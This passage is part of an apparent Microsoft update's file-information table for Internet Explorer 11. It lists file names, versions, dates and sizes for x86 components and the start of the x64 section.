\noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:33| 10,240 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:33| 10,240 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:34| 10,752 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:35| 10,240 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:36| 10,240 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:36| 9,728 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:37| 9,728 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:38| 10,240 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:38| 10,240 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:39| 6,656 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:40| 6,656 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:40| 6,656 \nwininet.dll| 11.0.9600.20112| 13-Aug-2021| 19:27| 4,387,840 \njsproxy.dll| 11.0.9600.20112| 13-Aug-2021| 19:58| 47,104 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:18| 114,176 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:18| 130,560 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:19| 124,928 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:20| 122,880 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:20| 130,048 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:21| 138,240 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 20:19| 114,688 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:22| 131,584 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:22| 117,760 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:23| 122,368 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:24| 134,144 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:25| 107,008 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:25| 123,392 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:26| 127,488 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:27| 128,512 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:27| 88,576 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:28| 82,944 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:28| 125,440 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:29| 123,392 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:30| 120,320 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:30| 130,560 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:31| 129,024 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:32| 125,952 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:32| 129,024 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:33| 128,000 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:33| 123,904 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:34| 129,024 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:35| 123,904 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:36| 124,416 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:36| 121,856 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:37| 115,712 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:38| 123,904 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:38| 125,440 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:39| 72,704 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:39| 73,728 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:40| 73,728 \niedkcs32.dll| 18.0.9600.20112| 19-Aug-2021| 18:17| 341,920 \ninstall.ins| Not versioned| 13-Aug-2021| 17:57| 464 \nieapfltr.dat| 10.0.9301.0| 20-Mar-2021| 20:53| 616,104 \nieapfltr.dll| 11.0.9600.20112| 13-Aug-2021| 19:16| 710,656 \ntdc.ocx| 11.0.9600.20112| 13-Aug-2021| 19:44| 73,728 \nDiagnosticsHub.DataWarehouse.dll| 11.0.9600.20112| 13-Aug-2021| 20:06| 489,472 \niedvtool.dll| 11.0.9600.20112| 13-Aug-2021| 20:33| 772,608 \nDiagnosticsHub_is.dll| 11.0.9600.20112| 13-Aug-2021| 20:07| 38,912 \ndxtmsft.dll| 11.0.9600.20112| 13-Aug-2021| 19:49| 415,744 \ndxtrans.dll| 11.0.9600.20112| 13-Aug-2021| 19:41| 280,064 \nMicrosoft-Windows-IE-F12-Provider.ptxml| Not versioned| 13-Aug-2021| 18:03| 11,892 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:18| 4,096 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:18| 4,096 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:19| 4,096 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:20| 4,096 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:20| 4,096 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:21| 4,096 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:19| 4,096 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:22| 4,096 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:22| 4,096 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:23| 4,096 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:24| 4,096 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:24| 4,096 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:25| 4,096 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:26| 4,096 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:26| 4,096 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:27| 3,584 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:28| 3,584 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:28| 4,096 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:29| 4,096 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:30| 4,096 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:30| 4,096 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:31| 4,096 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:32| 4,096 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:32| 4,096 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:33| 4,096 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:34| 4,096 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:34| 4,096 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:35| 4,096 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:35| 4,096 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:36| 4,096 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:37| 4,096 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:37| 4,096 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:38| 4,096 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:39| 3,584 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:39| 3,584 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:40| 3,584 \nDiagnosticsTap.dll| 11.0.9600.20112| 13-Aug-2021| 19:48| 175,104 \nF12Resources.dll| 11.0.9600.20112| 13-Aug-2021| 20:10| 10,948,096 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:18| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:18| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:19| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:20| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:20| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:21| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:19| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:22| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:22| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:23| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:24| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:24| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:25| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:26| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:26| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:27| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:28| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:28| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:29| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:30| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:31| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:31| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:32| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:32| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:33| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:34| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:34| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:35| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:35| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:36| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:37| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:37| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:38| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:39| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:40| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:40| 2,048 \nF12Tools.dll| 11.0.9600.20112| 13-Aug-2021| 19:47| 256,000 \nF12.dll| 11.0.9600.20112| 13-Aug-2021| 19:39| 1,207,808 \nmsfeeds.dll| 11.0.9600.20112| 13-Aug-2021| 19:35| 696,320 \nmsfeeds.mof| Not versioned| 13-Aug-2021| 18:11| 1,518 \nmsfeedsbs.mof| Not versioned| 13-Aug-2021| 18:11| 1,574 \nmsfeedsbs.dll| 11.0.9600.20112| 13-Aug-2021| 19:42| 52,736 \nmsfeedssync.exe| 11.0.9600.20112| 13-Aug-2021| 20:04| 11,776 \nhtml.iec| 2019.0.0.20112| 13-Aug-2021| 20:03| 341,504 \nmshtmled.dll| 11.0.9600.20112| 13-Aug-2021| 19:41| 76,800 \nmshtmlmedia.dll| 11.0.9600.20112| 13-Aug-2021| 19:33| 1,155,584 \nmshtml.dll| 11.0.9600.20112| 13-Aug-2021| 20:33| 20,294,144 \nmshtml.tlb| 11.0.9600.20112| 13-Aug-2021| 20:13| 2,724,864 \nMicrosoft-Windows-IE-HTMLRendering.ptxml| Not versioned| 13-Aug-2021| 18:03| 3,228 \nieetwcollector.exe| 11.0.9600.20112| 13-Aug-2021| 19:56| 104,960 \nieetwproxystub.dll| 11.0.9600.20112| 13-Aug-2021| 20:03| 47,616 \nieetwcollectorres.dll| 11.0.9600.20112| 13-Aug-2021| 20:13| 4,096 \nielowutil.exe| 11.0.9600.20112| 13-Aug-2021| 19:57| 221,184 \nieproxy.dll| 11.0.9600.20112| 13-Aug-2021| 19:14| 310,784 \nIEShims.dll| 11.0.9600.20112| 13-Aug-2021| 19:18| 290,304 \nWindows Pop-up Blocked.wav| Not versioned| 20-Mar-2021| 21:02| 85,548 \nWindows Information Bar.wav| Not versioned| 20-Mar-2021| 21:02| 23,308 \nWindows Feed Discovered.wav| Not versioned| 20-Mar-2021| 21:02| 19,884 \nWindows Navigation Start.wav| Not versioned| 20-Mar-2021| 21:02| 11,340 \nbing.ico| Not versioned| 20-Mar-2021| 20:55| 5,430 \nieUnatt.exe| 11.0.9600.20112| 13-Aug-2021| 19:56| 115,712 \nMicrosoft-Windows-IE-InternetExplorer-ppdlic.xrm-ms| Not versioned| 19-Aug-2021| 20:18| 2,956 \njsprofilerui.dll| 11.0.9600.20112| 13-Aug-2021| 19:43| 579,584 \nMemoryAnalyzer.dll| 11.0.9600.20112| 13-Aug-2021| 19:53| 1,399,296 \nMshtmlDac.dll| 11.0.9600.20112| 13-Aug-2021| 20:02| 64,000 \nnetworkinspection.dll| 11.0.9600.20112| 13-Aug-2021| 19:39| 1,075,200 \noccache.dll| 11.0.9600.20112| 13-Aug-2021| 19:40| 130,048 \ndesktop.ini| Not versioned| 20-Mar-2021| 20:54| 65 \nwebcheck.dll| 11.0.9600.20112| 13-Aug-2021| 19:35| 230,400 \ndesktop.ini| Not versioned| 20-Mar-2021| 20:54| 65 \nmsrating.dll| 11.0.9600.20112| 13-Aug-2021| 19:43| 168,960 \nicrav03.rat| Not versioned| 20-Mar-2021| 20:54| 8,798 \nticrf.rat| Not versioned| 20-Mar-2021| 20:54| 1,988 \niertutil.dll| 11.0.9600.20112| 13-Aug-2021| 20:07| 2,308,608 \nsqmapi.dll| 6.2.9200.16384| 19-Aug-2021| 18:17| 228,232 \nie4uinit.exe| 11.0.9600.20112| 13-Aug-2021| 19:34| 692,224 \niernonce.dll| 11.0.9600.20112| 13-Aug-2021| 19:58| 30,720 \niesetup.dll| 11.0.9600.20112| 13-Aug-2021| 20:04| 62,464 \nieuinit.inf| Not versioned| 13-Aug-2021| 18:56| 16,303 \ninseng.dll| 11.0.9600.20112| 13-Aug-2021| 19:44| 91,136 \nTimeline.dll| 11.0.9600.20112| 13-Aug-2021| 19:43| 154,112 \nTimeline_is.dll| 11.0.9600.20112| 13-Aug-2021| 19:58| 124,928 \nTimeline.cpu.xml| Not versioned| 20-Mar-2021| 20:54| 3,197 \nVGX.dll| 11.0.9600.20112| 13-Aug-2021| 19:41| 818,176 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:18| 2,066,432 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:18| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:19| 2,121,216 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:18| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:19| 2,075,648 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:19| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:20| 2,063,872 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:20| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:21| 2,314,240 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:20| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:21| 2,390,528 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:21| 3,584 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:19| 2,033,152 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:19| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:22| 2,307,584 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:22| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:22| 2,255,872 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:22| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:23| 2,061,312 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:23| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:24| 2,326,016 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:24| 3,584 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:25| 2,019,840 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:24| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:25| 2,071,040 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:25| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:26| 2,082,816 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:26| 3,584 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:27| 2,307,584 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:26| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:27| 2,170,368 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:27| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:28| 2,153,984 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:28| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:29| 2,291,712 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:28| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:29| 2,283,520 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:29| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:30| 2,052,096 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:30| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:31| 2,301,952 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:30| 3,584 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:31| 2,093,056 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:31| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:32| 2,075,648 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:32| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:33| 2,299,392 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:32| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:33| 2,094,592 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:33| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:34| 2,316,800 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:34| 3,584 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:35| 2,305,536 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:34| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:35| 2,278,912 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:35| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:36| 2,285,568 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:36| 3,584 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:36| 2,060,288 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:36| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:37| 2,315,776 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:37| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:38| 2,279,424 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:37| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:39| 2,324,992 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:38| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:39| 2,098,176 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:39| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:40| 1,890,304 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:39| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:40| 1,890,304 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:40| 3,072 \nieframe.dll| 11.0.9600.20112| 13-Aug-2021| 19:47| 13,881,856 \nieui.dll| 11.0.9600.20112| 13-Aug-2021| 19:58| 476,160 \nieframe.ptxml| Not versioned| 13-Aug-2021| 18:03| 24,486 \nieinstal.exe| 11.0.9600.20112| 13-Aug-2021| 19:41| 475,648 \nInetRes.adml| Not versioned| 19-Aug-2021| 18:18| 463,373 \nInetRes.adml| Not versioned| 19-Aug-2021| 18:18| 751,393 \nInetRes.adml| Not versioned| 19-Aug-2021| 18:19| 526,345 \nInetRes.adml| Not versioned| 19-Aug-2021| 18:20| 499,704 \nInetRes.adml| Not versioned| 19-Aug-2021| 18:20| 552,385 \nInetRes.adml| Not versioned| 19-Aug-2021| 18:21| 944,608 \nInetRes.adml| Not versioned| 19-Aug-2021| 20:19| 457,561 \nInetRes.adml| Not versioned| 19-Aug-2021| 18:22| 543,996 \nInetRes.adml| Not versioned| 19-Aug-2021| 18:22| 751,291 \nInetRes.adml| Not versioned| 19-Aug-2021| 18:23| 526,607 \nInetRes.adml| Not versioned| 19-Aug-2021| 18:24| 575,888 \nInetRes.adml| Not versioned| 19-Aug-2021| 18:24| 463,373 \nInetRes.adml| Not versioned| 19-Aug-2021| 18:25| 751,492 \nInetRes.adml| Not versioned| 19-Aug-2021| 18:26| 570,786 \nInetRes.adml| Not versioned| 19-Aug-2021| 18:26| 548,169 \nInetRes.adml| Not versioned| 19-Aug-2021| 18:27| 639,283 \nInetRes.adml| Not versioned| 19-Aug-2021| 18:28| 525,516 \nInetRes.adml| Not versioned| 19-Aug-2021| 18:28| 751,380 \nInetRes.adml| Not versioned| 19-Aug-2021| 18:29| 751,403 \nInetRes.adml| Not versioned| 19-Aug-2021| 18:30| 488,537 \nInetRes.adml| Not versioned| 19-Aug-2021| 18:30| 548,546 \nInetRes.adml| Not versioned| 19-Aug-2021| 18:31| 559,391 \nInetRes.adml| Not versioned| 19-Aug-2021| 18:32| 535,116 \nInetRes.adml| Not versioned| 19-Aug-2021| 18:32| 541,506 \nInetRes.adml| Not versioned| 19-Aug-2021| 18:33| 751,385 \nInetRes.adml| Not versioned| 19-Aug-2021| 18:34| 804,522 \nInetRes.adml| Not versioned| 19-Aug-2021| 18:34| 751,502 \nInetRes.adml| Not versioned| 19-Aug-2021| 18:35| 751,349 \nInetRes.adml| Not versioned| 19-Aug-2021| 18:35| 751,327 \nInetRes.adml| Not versioned| 19-Aug-2021| 18:36| 503,959 \nInetRes.adml| Not versioned| 19-Aug-2021| 18:37| 751,523 \nInetRes.adml| Not versioned| 19-Aug-2021| 18:37| 521,630 \nInetRes.adml| Not versioned| 19-Aug-2021| 18:38| 751,288 \nInetRes.adml| Not versioned| 19-Aug-2021| 18:39| 420,094 \nInetRes.adml| Not versioned| 19-Aug-2021| 18:39| 436,663 \nInetRes.adml| Not versioned| 19-Aug-2021| 18:40| 436,663 \ninetres.admx| Not versioned| 20-Mar-2021| 21:22| 1,678,023 \nMsSpellCheckingFacility.exe| 6.3.9600.20112| 13-Aug-2021| 19:51| 668,672 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:18| 29,184 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:18| 29,696 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:19| 32,768 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:20| 33,280 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:21| 35,328 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:21| 37,888 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:19| 29,696 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:22| 34,304 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:22| 29,696 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:23| 33,280 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:24| 34,304 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:24| 27,648 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:25| 29,696 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:26| 34,304 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:26| 33,792 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:27| 23,040 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:28| 22,016 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:29| 29,696 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:29| 29,696 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:30| 31,232 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:30| 34,304 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:31| 35,840 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:32| 32,768 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:32| 33,280 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:33| 29,696 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:34| 34,816 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:34| 33,280 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:35| 32,256 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:36| 29,696 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:36| 32,768 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:37| 29,696 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:37| 30,720 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:38| 29,696 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:39| 16,384 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:39| 16,896 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:40| 16,896 \njscript9.dll| 11.0.9600.20112| 13-Aug-2021| 19:52| 4,119,040 \njscript9diag.dll| 11.0.9600.20112| 13-Aug-2021| 19:55| 620,032 \njscript.dll| 5.8.9600.20112| 13-Aug-2021| 19:56| 653,824 \nvbscript.dll| 5.8.9600.20112| 13-Aug-2021| 20:04| 498,176 \n \n### \n\n__\n\nInternet Explorer 11 on all supported x64-based versions\n\n**File name**| **File version**| **Date**| **Time**| **File size** \n---|---|---|---|--- \nurlmon.dll| 11.0.9600.20112| 13-Aug-2021| 19:28| 1,562,624 \niexplore.exe| 11.0.9600.20112| 19-Aug-2021| 19:48| 810,376 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:49| 31,744 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:50| 36,352 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:50| 35,328 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:51| 34,816 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:51| 36,864 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:52| 39,424 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:53| 32,768 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:53| 37,376 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:53| 33,280 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:54| 34,816 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:55| 38,400 